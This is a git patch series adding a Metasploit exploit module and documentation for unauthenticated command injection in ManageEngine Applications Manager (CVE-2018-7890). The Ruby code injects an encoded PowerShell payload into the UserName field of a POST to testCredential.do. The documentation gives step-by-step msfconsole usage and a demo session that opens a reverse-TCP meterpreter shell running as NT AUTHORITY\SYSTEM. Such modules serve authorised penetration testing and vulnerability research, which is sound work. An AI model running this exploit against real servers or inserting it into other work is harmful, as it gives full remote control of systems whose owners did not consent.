From 611b20826754a1d3f33dbb0585b7da2c6583363a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mehmet=20=C4=B0nce?= Date: Wed, 7 Mar 2018 23:54:01 +0300 Subject: [PATCH 1/8] Adding ManageEngine Application Manager RCE --- .../http/manageengine_appmanager_exec.md | 46 +++++++ .../http/manageengine_appmanager_exec.rb | 116 ++++++++++++++++++ 2 files changed, 162 insertions(+) create mode 100644 documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md create mode 100644 modules/exploits/windows/http/manageengine_appmanager_exec.rb diff --git a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md new file mode 100644 index 0000000000..d18d5ceda4 --- /dev/null +++ b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md @@ -0,0 +1,46 @@ +## Vulnerable Application +This module exploits command injection vulnerability in the ManageEngine Application Manager product. An unauthenticated user can execute a operating system command under the context of privileged user. Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials by accessing given system. This endpoint calls a several internal classes and then executes powershell script without validating user supplied parameter when the given system is OfficeSharePointServer. + +**Vulnerable Application Installation Steps** + +Go to following website and download Windows version of the product. It comes with built-in Java and Postgresql so you don't need to install anything else. +[https://www.manageengine.com/products/applications_manager/download.html](https://www.manageengine.com/products/applications_manager/download.html) + +## Verification Steps + +A successful check of the exploit will look like this: + +- [ ] Start `msfconsole` +- [ ] `use exploit/linux/http/securityonion_xplico_exec` +- [ ] Set `RHOST` +- [ ] Set `PAYLOAD windows/meterpreter/reverse_tcp` +- [ ] Set `LHOST` +- [ ] Run `check` +- [ ] **Verify** that you are seeing `The target is vulnerable.` in console. +- [ ] Run `exploit` +- [ ] **Verify** that you are seeing `Triggering the vulnerability` in console. +- [ ] **Verify** that you are seeing `Sending stage (179779 bytes) to ` in console. +- [ ] **Verify** that you have your shell. + +## Scenarios + +``` +msf5 > +msf5 > use exploit/windows/http/manageengine_appmanager_exec +msf5 exploit(windows/http/manageengine_appmanager_exec) > set RHOST 12.0.0.192 +RHOST => 12.0.0.192 +msf5 exploit(windows/http/manageengine_appmanager_exec) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf5 exploit(windows/http/manageengine_appmanager_exec) > set LHOST 12.0.0.1 +LHOST => 12.0.0.1 +msf5 exploit(windows/http/manageengine_appmanager_exec) > check +[+] 12.0.0.192:9090 The target is vulnerable. +msf5 exploit(windows/http/manageengine_appmanager_exec) > run + +[*] Started reverse TCP handler on 12.0.0.1:4444 +[*] Trigerring the vulnerability +[*] Sending stage (179779 bytes) to 12.0.0.192 + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +``` \ No newline at end of file diff --git a/modules/exploits/windows/http/manageengine_appmanager_exec.rb b/modules/exploits/windows/http/manageengine_appmanager_exec.rb new file mode 100644 index 0000000000..0c32d01dac --- /dev/null +++ b/modules/exploits/windows/http/manageengine_appmanager_exec.rb @@ -0,0 +1,116 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Powershell + + def initialize(info={}) + super(update_info(info, + 'Name' => "ManageEngine Applications Manager Remote Code Execution", + 'Description' => %q{ + This module exploits command injection vulnerability in the ManageEngine Application Manager product. + An unauthenticated user can execute a operating system command under the context of privileged user. + + Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials + by accessing given system. This endpoint calls a several internal classes and then executes powershell script + without validating user supplied parameter when the given system is OfficeSharePointServer. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/'] + ], + 'DefaultOptions' => + { + 'WfsDelay' => 10, + 'RPORT' => 9090 + }, + 'Payload' => + { + 'BadChars' => "\x22" + }, + 'Platform' => ['win'], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'Targets' => [ ['Automatic', {}] ], + 'Privileged' => true, + 'DisclosureDate' => 'Mar 7 2018', + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI of the application', '/']) + ] + ) + end + + def check + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'testCredential.do'), + 'vars_post' => { + 'method' => 'testCredentialForConfMonitors', + 'type' => 'OfficeSharePointServer', + 'montype' => 'OfficeSharePointServer', + 'isAgentEnabled' => 'NO', + 'isAgentAssociated' => 'false', + 'displayname' => Rex::Text.rand_text_alpha(10), + 'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems... + 'Version' => '2013', + 'Powershell' => 'True', # :-) + 'CredSSP' => 'False', + 'SPType' => 'SPServer', + 'CredentialDetails' => 'nocm', + 'Password' => Rex::Text.rand_text_alpha(3), + 'UserName' => Rex::Text.rand_text_alpha(3) + } + }) + if res && res.body.include?('Kindly check the credentials and try again') + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + + def exploit + + powershell_options = { + encode_final_payload: true, + remove_comspec: true + } + p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options) + + print_status('Triggering the vulnerability') + + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'testCredential.do'), + 'vars_post' => { + 'method' => 'testCredentialForConfMonitors', + 'type' => 'OfficeSharePointServer', + 'montype' => 'OfficeSharePointServer', + 'isAgentEnabled' => 'NO', + 'isAgentAssociated' => 'false', + 'displayname' => Rex::Text.rand_text_alpha(10), + 'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems... + 'Version' => '2013', + 'Powershell' => 'True', # :-) + 'CredSSP' => 'False', + 'SPType' => 'SPServer', + 'CredentialDetails' => 'nocm', + 'Password' => Rex::Text.rand_text_alpha(3), + 'UserName' => "$(#{p})" + } + }) + + end +end From 4b483e079b2cb50f5db7407ac3fc1c64b288398a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mehmet=20=C4=B0nce?= Date: Fri, 9 Mar 2018 12:25:19 +0300 Subject: [PATCH 2/8] Adding assigned CVE number --- modules/exploits/windows/http/manageengine_appmanager_exec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/windows/http/manageengine_appmanager_exec.rb b/modules/exploits/windows/http/manageengine_appmanager_exec.rb index 0c32d01dac..2012d4d706 100644 --- a/modules/exploits/windows/http/manageengine_appmanager_exec.rb +++ b/modules/exploits/windows/http/manageengine_appmanager_exec.rb @@ -27,6 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ + ['CVE', '2018-7890'], ['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/'] ], 'DefaultOptions' => From 2fd9b0b77bd5681d347046c93f28b056635d9285 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mehmet=20=C4=B0nce?= Date: Tue, 13 Mar 2018 01:40:01 +0300 Subject: [PATCH 3/8] Fixing rubocop errors --- .../http/manageengine_appmanager_exec.rb | 20 +++++++++---------- 1 file changed, 9 insertions(+), 11 deletions(-) diff --git a/modules/exploits/windows/http/manageengine_appmanager_exec.rb b/modules/exploits/windows/http/manageengine_appmanager_exec.rb index 2012d4d706..d500a85dc2 100644 --- a/modules/exploits/windows/http/manageengine_appmanager_exec.rb +++ b/modules/exploits/windows/http/manageengine_appmanager_exec.rb @@ -9,17 +9,17 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Powershell - def initialize(info={}) + def initialize(info = {}) super(update_info(info, 'Name' => "ManageEngine Applications Manager Remote Code Execution", - 'Description' => %q{ + 'Description' => %q( This module exploits command injection vulnerability in the ManageEngine Application Manager product. An unauthenticated user can execute a operating system command under the context of privileged user. Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials by accessing given system. This endpoint calls a several internal classes and then executes powershell script without validating user supplied parameter when the given system is OfficeSharePointServer. - }, + ), 'License' => MSF_LICENSE, 'Author' => [ @@ -40,8 +40,8 @@ class MetasploitModule < Msf::Exploit::Remote 'BadChars' => "\x22" }, 'Platform' => ['win'], - 'Arch' => [ ARCH_X86, ARCH_X64 ], - 'Targets' => [ ['Automatic', {}] ], + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => [['Automatic', {}]], 'Privileged' => true, 'DisclosureDate' => 'Mar 7 2018', 'DefaultTarget' => 0 @@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote end def check - res = send_request_cgi({ + res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'testCredential.do'), 'vars_post' => { @@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Password' => Rex::Text.rand_text_alpha(3), 'UserName' => Rex::Text.rand_text_alpha(3) } - }) + ) if res && res.body.include?('Kindly check the credentials and try again') Exploit::CheckCode::Vulnerable else @@ -83,7 +83,6 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - powershell_options = { encode_final_payload: true, remove_comspec: true @@ -92,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote print_status('Triggering the vulnerability') - send_request_cgi({ + send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'testCredential.do'), 'vars_post' => { @@ -111,7 +110,6 @@ class MetasploitModule < Msf::Exploit::Remote 'Password' => Rex::Text.rand_text_alpha(3), 'UserName' => "$(#{p})" } - }) - + ) end end From ec10a82c56e01c92983c6b8d6857221986aab32c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mehmet=20=C4=B0nce?= Date: Tue, 13 Mar 2018 09:44:13 +0300 Subject: [PATCH 4/8] Make the rubocop happy --- .../exploits/windows/http/manageengine_appmanager_exec.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/http/manageengine_appmanager_exec.rb b/modules/exploits/windows/http/manageengine_appmanager_exec.rb index d500a85dc2..0f5b925f57 100644 --- a/modules/exploits/windows/http/manageengine_appmanager_exec.rb +++ b/modules/exploits/windows/http/manageengine_appmanager_exec.rb @@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote ['CVE', '2018-7890'], ['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/'] ], - 'DefaultOptions' => + 'DefaultOptions' => { 'WfsDelay' => 10, 'RPORT' => 9090 @@ -44,8 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Targets' => [['Automatic', {}]], 'Privileged' => true, 'DisclosureDate' => 'Mar 7 2018', - 'DefaultTarget' => 0 - )) + 'DefaultTarget' => 0)) register_options( [ From 889c914b3dbede621ad3b55572b908f22e79be62 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mehmet=20=C4=B0nce?= Date: Tue, 13 Mar 2018 12:05:27 +0300 Subject: [PATCH 5/8] Updating documentation and minor code changes --- .../http/manageengine_appmanager_exec.md | 8 ++--- .../http/manageengine_appmanager_exec.rb | 30 +++++-------------- 2 files changed, 11 insertions(+), 27 deletions(-) diff --git a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md index d18d5ceda4..dd6c219ed9 100644 --- a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md +++ b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md @@ -11,15 +11,15 @@ Go to following website and download Windows version of the product. It comes wi A successful check of the exploit will look like this: - [ ] Start `msfconsole` -- [ ] `use exploit/linux/http/securityonion_xplico_exec` -- [ ] Set `RHOST` +- [ ] `use exploit/windows/http/manageengine_appmanager_exec` +- [ ] Set `RHOST ` - [ ] Set `PAYLOAD windows/meterpreter/reverse_tcp` -- [ ] Set `LHOST` +- [ ] Set `LHOST ` - [ ] Run `check` - [ ] **Verify** that you are seeing `The target is vulnerable.` in console. - [ ] Run `exploit` - [ ] **Verify** that you are seeing `Triggering the vulnerability` in console. -- [ ] **Verify** that you are seeing `Sending stage (179779 bytes) to ` in console. +- [ ] **Verify** that you are seeing `Sending stage to ` in console. - [ ] **Verify** that you have your shell. ## Scenarios diff --git a/modules/exploits/windows/http/manageengine_appmanager_exec.rb b/modules/exploits/windows/http/manageengine_appmanager_exec.rb index 0f5b925f57..f0808a3fd1 100644 --- a/modules/exploits/windows/http/manageengine_appmanager_exec.rb +++ b/modules/exploits/windows/http/manageengine_appmanager_exec.rb @@ -54,26 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote end def check - res = send_request_cgi( - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, 'testCredential.do'), - 'vars_post' => { - 'method' => 'testCredentialForConfMonitors', - 'type' => 'OfficeSharePointServer', - 'montype' => 'OfficeSharePointServer', - 'isAgentEnabled' => 'NO', - 'isAgentAssociated' => 'false', - 'displayname' => Rex::Text.rand_text_alpha(10), - 'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems... - 'Version' => '2013', - 'Powershell' => 'True', # :-) - 'CredSSP' => 'False', - 'SPType' => 'SPServer', - 'CredentialDetails' => 'nocm', - 'Password' => Rex::Text.rand_text_alpha(3), - 'UserName' => Rex::Text.rand_text_alpha(3) - } - ) + res = trigger_endpoint(Rex::Text.rand_text_alpha(3)) if res && res.body.include?('Kindly check the credentials and try again') Exploit::CheckCode::Vulnerable else @@ -90,6 +71,10 @@ class MetasploitModule < Msf::Exploit::Remote print_status('Triggering the vulnerability') + trigger_endpoint("$(#{p})") + end + + def trigger_endpoint(username) send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'testCredential.do'), @@ -99,15 +84,14 @@ class MetasploitModule < Msf::Exploit::Remote 'montype' => 'OfficeSharePointServer', 'isAgentEnabled' => 'NO', 'isAgentAssociated' => 'false', - 'displayname' => Rex::Text.rand_text_alpha(10), + 'displayname' => Rex::Text.rand_text_alpha(rand(10..15)), 'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems... - 'Version' => '2013', 'Powershell' => 'True', # :-) 'CredSSP' => 'False', 'SPType' => 'SPServer', 'CredentialDetails' => 'nocm', 'Password' => Rex::Text.rand_text_alpha(3), - 'UserName' => "$(#{p})" + 'UserName' => username } ) end From b55a750fa9d73cf63c61b9b92e7cb4bd0479ff16 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mehmet=20=C4=B0nce?= Date: Wed, 14 Mar 2018 11:51:21 +0300 Subject: [PATCH 6/8] Fix typo and couple tiny nitpicks --- .../exploit/windows/http/manageengine_appmanager_exec.md | 2 +- modules/exploits/windows/http/manageengine_appmanager_exec.rb | 4 +++- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md index dd6c219ed9..45074179b5 100644 --- a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md +++ b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md @@ -1,5 +1,5 @@ ## Vulnerable Application -This module exploits command injection vulnerability in the ManageEngine Application Manager product. An unauthenticated user can execute a operating system command under the context of privileged user. Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials by accessing given system. This endpoint calls a several internal classes and then executes powershell script without validating user supplied parameter when the given system is OfficeSharePointServer. +This module exploits command injection vulnerability in the ManageEngine Applications Manager product. An unauthenticated user can execute a operating system command under the context of privileged user. Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials by accessing given system. This endpoint calls a several internal classes and then executes powershell script without validating user supplied parameter when the given system is OfficeSharePointServer. **Vulnerable Application Installation Steps** diff --git a/modules/exploits/windows/http/manageengine_appmanager_exec.rb b/modules/exploits/windows/http/manageengine_appmanager_exec.rb index f0808a3fd1..dcbbbec2aa 100644 --- a/modules/exploits/windows/http/manageengine_appmanager_exec.rb +++ b/modules/exploits/windows/http/manageengine_appmanager_exec.rb @@ -28,7 +28,9 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ ['CVE', '2018-7890'], - ['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/'] + ['BID', '103358'], + ['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/'], + ['URL', 'https://pitstop.manageengine.com/portal/community/topic/security-vulnerability-issues-fixed-upgrade-to-the-latest-version-of-applications-manager'] ], 'DefaultOptions' => { From 53eabfc1df43fa289bc800c697900dd43ee62ef4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mehmet=20=C4=B0nce?= Date: Mon, 19 Mar 2018 23:27:18 +0300 Subject: [PATCH 7/8] Update documentation and add check before exploit --- .../exploit/windows/http/manageengine_appmanager_exec.md | 2 +- modules/exploits/windows/http/manageengine_appmanager_exec.rb | 2 ++ 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md index 45074179b5..2ed4e8766a 100644 --- a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md +++ b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md @@ -4,7 +4,7 @@ This module exploits command injection vulnerability in the ManageEngine Applica **Vulnerable Application Installation Steps** Go to following website and download Windows version of the product. It comes with built-in Java and Postgresql so you don't need to install anything else. -[https://www.manageengine.com/products/applications_manager/download.html](https://www.manageengine.com/products/applications_manager/download.html) +[http://archives.manageengine.com/applications_manager/13630/](http://archives.manageengine.com/applications_manager/13630/) ## Verification Steps diff --git a/modules/exploits/windows/http/manageengine_appmanager_exec.rb b/modules/exploits/windows/http/manageengine_appmanager_exec.rb index dcbbbec2aa..802641e369 100644 --- a/modules/exploits/windows/http/manageengine_appmanager_exec.rb +++ b/modules/exploits/windows/http/manageengine_appmanager_exec.rb @@ -65,6 +65,8 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit + fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') unless check == Exploit::CheckCode::Vulnerable + powershell_options = { encode_final_payload: true, remove_comspec: true From fb0d87163c89b741beae722b418f4d018e4c351f Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Tue, 27 Mar 2018 15:16:39 -0500 Subject: [PATCH 8/8] Update documentation for manageengine_appmanager_exec --- .../http/manageengine_appmanager_exec.md | 26 +++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md index 2ed4e8766a..427f7611bd 100644 --- a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md +++ b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md @@ -1,4 +1,4 @@ -## Vulnerable Application +exploit/windows/http/manageengine_appmanager_exec.md## Vulnerable Application This module exploits command injection vulnerability in the ManageEngine Applications Manager product. An unauthenticated user can execute a operating system command under the context of privileged user. Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials by accessing given system. This endpoint calls a several internal classes and then executes powershell script without validating user supplied parameter when the given system is OfficeSharePointServer. **Vulnerable Application Installation Steps** @@ -10,19 +10,19 @@ Go to following website and download Windows version of the product. It comes wi A successful check of the exploit will look like this: -- [ ] Start `msfconsole` -- [ ] `use exploit/windows/http/manageengine_appmanager_exec` -- [ ] Set `RHOST ` -- [ ] Set `PAYLOAD windows/meterpreter/reverse_tcp` -- [ ] Set `LHOST ` -- [ ] Run `check` -- [ ] **Verify** that you are seeing `The target is vulnerable.` in console. -- [ ] Run `exploit` -- [ ] **Verify** that you are seeing `Triggering the vulnerability` in console. -- [ ] **Verify** that you are seeing `Sending stage to ` in console. -- [ ] **Verify** that you have your shell. +* Start `msfconsole` +* `use exploit/windows/http/manageengine_appmanager_exec` +* Set `RHOST ` +* Set `PAYLOAD windows/meterpreter/reverse_tcp` +* Set `LHOST ` +* Run `check` +* **Verify** that you are seeing `The target is vulnerable.` in console. +* Run `exploit` +* **Verify** that you are seeing `Triggering the vulnerability` in console. +* **Verify** that you are seeing `Sending stage to ` in console. +* **Verify** that you have your shell. -## Scenarios +## Demo ``` msf5 >